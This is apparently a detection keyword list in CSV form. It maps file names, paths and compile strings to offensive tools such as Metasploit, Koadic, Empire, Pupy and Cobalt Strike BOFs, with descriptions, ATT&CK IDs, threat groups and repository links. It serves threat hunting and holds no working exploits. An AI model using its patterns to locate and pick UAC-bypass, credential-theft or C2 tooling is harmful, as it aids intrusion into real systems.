-*bypassuac_eventvwr*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bypassuac_fodhelper*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bypassuac_injection*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_injection.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_injection.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_injection_winsxs.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_registry.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*bypassuac_sdclt*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bypassuac_silentcleanup.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_slui*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bypassuac_sluihijack.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_systempropertiesadvanced*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*bypassuac_token_imp.*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*bypassuac_vbs.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_windows_store_reg.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac_wsreset*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*BypassUACTokenManipulation*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1122,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*bypassuac-x64.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac-x64.exe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac-x86.dll*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypassuac-x86.exe*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*bypasswaf.jar*,offensive_tool_keyword,burpsuite,Collection of burpsuite plugins,T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574,TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/Mr-xn/BurpSuite-collections,1,1,N/A,N/A,10,2757,606,2023-08-04T13:50:07Z,2020-01-25T02:07:37Z -*bypasswaf.jar*,offensive_tool_keyword,bypasswaf,Add headers to all Burp requests to bypass some WAF products,T1090 - T1189 - T1001,TA0002 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/codewatchorg/bypasswaf,1,1,N/A,N/A,4,323,117,2018-01-28T13:13:39Z,2014-11-17T01:29:35Z -*bypasswaf.py*,offensive_tool_keyword,bypasswaf,Add headers to all Burp requests to bypass some WAF products,T1090 - T1189 - T1001,TA0002 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/codewatchorg/bypasswaf,1,1,N/A,N/A,4,323,117,2018-01-28T13:13:39Z,2014-11-17T01:29:35Z -*byt3bl33d3r*,offensive_tool_keyword,Github Username,malware and offensive tools developper ,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/byt3bl33d3r,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*byt3bl33d3r/BOF-Nim*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF Files with Nim!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/byt3bl33d3r/BOF-Nim,1,1,N/A,10,10,83,12,2022-07-10T22:12:10Z,2021-01-12T18:58:23Z -*byt3bl33d3r/DeathStar*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*byt3bl33d3r/gcat*,offensive_tool_keyword,gcat,A PoC backdoor that uses Gmail as a C&C server,T1071.001 - T1094 - T1102.002,TA0011 - TA0010 - TA0008,N/A,N/A,C2,https://github.com/byt3bl33d3r/gcat,1,1,N/A,10,10,1300,466,2018-11-16T13:43:15Z,2015-06-03T01:28:00Z -*byt3bl33d3r/ItWasAllADream*,offensive_tool_keyword,ItWasAllADream,A PrintNightmare (CVE-2021-34527) Python Scanner. Scan entire subnets for hosts vulnerable to the PrintNightmare RCE,T1046 - T1210.002 - T1047,TA0007 - TA0002,N/A,N/A,Discovery,https://github.com/byt3bl33d3r/ItWasAllADream,1,1,N/A,7,8,738,118,2023-08-25T16:11:40Z,2021-07-05T20:13:49Z -*byt3bl33d3r/pth-toolkit*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*byt3bl33d3r/SpamChannel*,offensive_tool_keyword,SpamChannel,poof emails from any of the +2 Million domains using MailChannels,T1566 - T1566.001,TA0011,N/A,N/A,Sniffing & Spoofing,https://github.com/byt3bl33d3r/SpamChannel,1,1,N/A,8,3,256,28,2023-09-21T12:25:03Z,2022-12-20T21:31:55Z -*-c /tmp/redsocks.conf*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,0,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*-c 854A20FB-2D44-457D-992F-EF13785D2B51*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,0,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*-c BOF.cpp -o BOF.o*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*-c BOF.cpp -o BOF.x64.o*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*-c credentialmanager.c -o credentialmanager.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*-c modifiableautorun.c -o modifiableautorun.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*-c tokenprivileges.c -o tokenprivileges.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*-c unquotedsvcpath.c -o unquotedsvcpath.o*,offensive_tool_keyword,PrivKit,PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.,T1548.002 - T1059.003 - T1027.002,TA0005,N/A,N/A,Privilege Escalation,https://github.com/mertdas/PrivKit,1,0,N/A,9,3,265,35,2023-03-23T09:50:09Z,2023-03-20T04:19:40Z -*C&C => *,offensive_tool_keyword,C2_Server,C2 server to connect to a victim machine via reverse shell,T1090 - T1090.001 - T1071 - T1071.001,TA0011 ,N/A,N/A,C2,https://github.com/reveng007/C2_Server,1,0,N/A,10,10,31,17,2022-02-27T02:00:02Z,2021-03-05T12:35:45Z -*c:/users/public/creds.log*,offensive_tool_keyword,undertheradar,scripts that afford the pentester AV bypass techniques,T1055.005 - T1027 - T1116 - T1070.004,TA0040 - TA0005 - TA0009,N/A,N/A,Defense Evasion,https://github.com/g3tsyst3m/undertheradar,1,0,N/A,9,1,7,0,2023-08-10T00:30:20Z,2023-07-01T17:59:20Z -*C:\aab.txt*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -*c:\agent.exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,0,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*C:\dsc_hello.txt*,offensive_tool_keyword,MicroBurst,A collection of scripts for assessing Microsoft Azure security,T1583 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation tools,https://github.com/NetSPI/MicroBurst,1,0,N/A,6,10,1709,280,2023-09-21T15:53:06Z,2018-07-16T16:47:20Z -*C:\ProgramData\Prefetch\na.exe*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z 